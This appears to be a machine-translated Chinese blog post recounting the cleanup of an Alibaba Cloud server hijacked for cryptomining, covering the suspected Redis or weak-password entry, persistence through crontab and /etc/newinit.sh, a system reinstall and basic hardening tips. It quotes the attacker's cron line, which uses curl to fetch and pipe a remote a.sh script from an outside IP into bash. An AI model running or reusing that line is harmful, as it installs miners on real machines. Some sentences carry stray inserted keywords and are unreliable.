服务器被黑并用于挖矿！ 该怎么办？

关注我，和表弟一起学习Python和云服务器

跟着老表哥学习云服务器开发的相关文章（如果是第一次阅读本系列文章，强烈建议先学习以下文章）：

大家好，我是表哥~

昨天下午有朋友告诉我，他的服务器被阿里云检测到挖矿，然后阿里云正式关闭了服务器。

别着急，这个时候最简单的方法就是在阿里云提工单，反馈相关问题。

挖矿程序简单分析

清理挖矿程序

服务器安全建议

解锁服务器

解决问题，排查和删除挖矿程序，首先我们需要解封服务器。 登录阿里云官方平台后，点击控制台->头像->安全控制，进入相关页面。

在惩罚列表中，我们可以看到相关的惩罚记录，点击解禁后，就可以正常进入服务器了。

解禁后会有提示，需要在三天内找到挖矿程序并删除，否则官方会再次封服，并且无法再次解封（差不多意思，这个服务器没用！官方会直接回收）

疑难解答 “黑客”如何登录并控制我的服务器？

我们可以先看看阿里云提供的漏洞管理监控，发现确实存在漏洞，提示：Redis未授权弱密码。

我在网上查了一下，确实可以通过Redis将本地的公钥注入到服务器的/root/.ssh/authorized_keys中，然后“黑客”就可以在本地无密登录你的服务器了。 . .

所以，如果你的服务器上安装了redisetc用什么挖矿，你可以先考虑这个问题。 出现这个问题的主要原因一般是：

所以，如果不是业务需求，不要开启redis远程登录，设置一个比较复杂的不会出现在网络上的密码，开启的端口也可以更改。 还有一点就是不要用root用户启动redis，这样即使远程连上redis也不能修改root下的权限~

详情请看这篇文章：

上面说了，可能是redis的弱命令导致“黑客”有机会登录我们的服务器，但是我看到我朋友的服务器上并没有安装redis（不知道为什么阿里云会检测此漏洞）。 . .

然后我继续找问题。 首先，我需要登录到服务器。 当我询问登录密码时，发现登录密码在（阿里云客服）工单里？ 有点懵哈哈哈哈。 . .

原来朋友修改登录密码后无法远程连接，于是提交工单让客服修改远程连接密码，客服设置的密码应该是比较常见的aliyun2021@zSS . . . 至此，个人感觉是远程连接密码被破解/泄露，导致挖矿程序入侵。 （欢迎大家指正）

找矿工

一般来说，挖矿程序要想一直运行，就必须设置一些定时任务。 Linux下一般用cron设置，用户可以使用crontab设置定时任务。

首先，我们可以输入crontab -e编辑root用户的crontab文件内容，查看是否有定时任务；

crontab -e

（默认是使用vim编辑器，如果要退出编辑模式，可以先按ESC，然后输入：qw回车退出，具体操作可以看linux相关）进入文件编辑，虽然说明不是很明白，但是看到当我到达一个网站或者一个ip地址的时候，首先我很确定这个ip不是我当前登录的服务器，看链接，它应该是我下载了一个a.sh文件，有点像我的~

*/30 * * * * /bin/cdz -fsSL http://104.192.82.138/sxxxxx5/a/a.sh | bash > /dev/null 2>&1

我注销后还是显示我没有权限修改？ 他奶奶的~可以用ls -l /tmp/crontab.LQJ6aT查看文件的属主权限，当然也可以直接用sudo命令强制修改或删除。

我们可以查看这个IP地址的基本信息etc用什么挖矿，可以看出是美国的IP~所以几乎是脱不了关系，它是一家矿业公司！ ！ ！

那我们继续研究之前发现的crontab问题，先进入/tmp目录，查看所有crontab相关文件~

有的找到了，有的没有，我们直接使用rm -rf 文件名删除所有相关文件：

sudo rm -rf crontab.*

心想应该是这样的，又跑crontab -e，发现会生成一个新的crontab.*文件，而且自动会有挖矿内容~离谱！ ！ ！

想了想，可能是crontab配置的问题。 输入以下命令查看相关配置文件~果然，

cat /etc/crontab

这是朋友服务器

虽然我还不能完全理解这个命令的意思，但是看到这个newinit.sh，我就知道不是什么好东西了。

所以我在我的云服务器上看了看，果然不一样。

普通的

从网上的crontab相关教程也可以看出，我自己的是正常的~

是否可以修改crontab配置文件？

挖矿程序简单分析

我们得检查这个狗屎的挖矿脚本！ ！ ！ 从配置文件可以看出这个脚本在/etc/newinit.sh中，我们直接使用nano查看这个文件的内容，

nano /etc/newinit.sh

可以看到这个脚本一共125行代码~其他的我看不懂，但是这个函数名看懂了kill main进程~

接下来我们看看他在这个脚本中做了什么（本人对linux相关操作不熟悉，所以下面对脚本文件的简单分析难免有错误或错误，请大家批评指正，但不要恶意攻击~） :

第一部分

第二部分

第三部分

第四部分

第五部分

最后

最后看了第四部分提到的挖矿程序配置中的链接。 不知道是不是没看到。 当我看到它时，我感到震惊。 原来这个有996行代码（是不是在暗示什么！！！）

修改了很多系统配置~要是服务器里有什么重要的东西，或者之前有配置什么麻烦的环境，修改起来还是挺麻烦的！

清理挖矿程序

最简单的方法就是直接重装系统。 我这里也是选择这种方式，因为这位朋友的服务器里没有什么可以备份的。

如前所述，如果有很多重要的东西和难以配置的环境，而你不想花时间备份和重新配置更改，你可以选择根据挖矿脚本将他对系统的修改一一修复程序。 . . 996行代码看着都累！

重置系统要容易得多。 进入阿里云控制台，然后找到对应的实例，先停止服务器，然后点击更多->云盘和镜像->更改操作系统。

会有更换提示，建议仔细阅读。

如需更换操作系统，您可以选择与之前相同的配置，也可以选择其他配置，然后点击确认订购。

替换成功后，服务器会自动启动。 我们可以点击管理控制台，尝试远程登录。

这里的相关操作和设置和我们之前分享的介绍基本一致。 从下图可以看出crontab配置正常。

最后我们可以看一段时间后的CPU使用率，可以看到之前使用率基本是100%，但是重置系统后，使用率变成了2.6%左右。

服务器安全建议

预防的首要前提是不影响我们的使用，甚至所有的操作都应该方便我们使用。

1、目前我还是推荐刚接触云服务器或者不熟悉云服务器的读者使用宝塔面板登录和操作服务器内容。 具体的功能和使用方法可以看我之前的分享。

2、所有安装的应用服务，尽量不要使用默认的端口号。 如果有设置密码的密码，就不用觉得麻烦了。 您可以使用网站 1password.com 生成随机密码。 之前也分享过一个脚本~

import string
import random
while True:
    try:
        password_len = int(input('请输入密码长度（只能是数字）：'))
        password = ''.join(random.choices(string.printable.strip(), k=password_len))
        print(f'你的新密码为：{password}，请保存好～')
    except Exception as e:
        print(f'【出错啦】看看是不是输入错误吧，可能是输入了非数字内容，错误信息：{e}')
    print('*** 想结束就输入0吧！！！***')
    print('*** 回车继续生成新密码 ***')
    flag = input('是否继续生成新密码：')
    if flag == '0':
        break
    print('******************************************')

3.不要关闭系统自带的防火墙和安全保护~

其他方法欢迎补充~今天就到这里吧！

坚持和努力：终究会有所成就。

那么下期见，我是爱猫爱科技爱思思的老表妹⁽⁽ଘ(˙꒳˙)ଓ⁾⁾

近期阅读和学习建议：

如何找到我：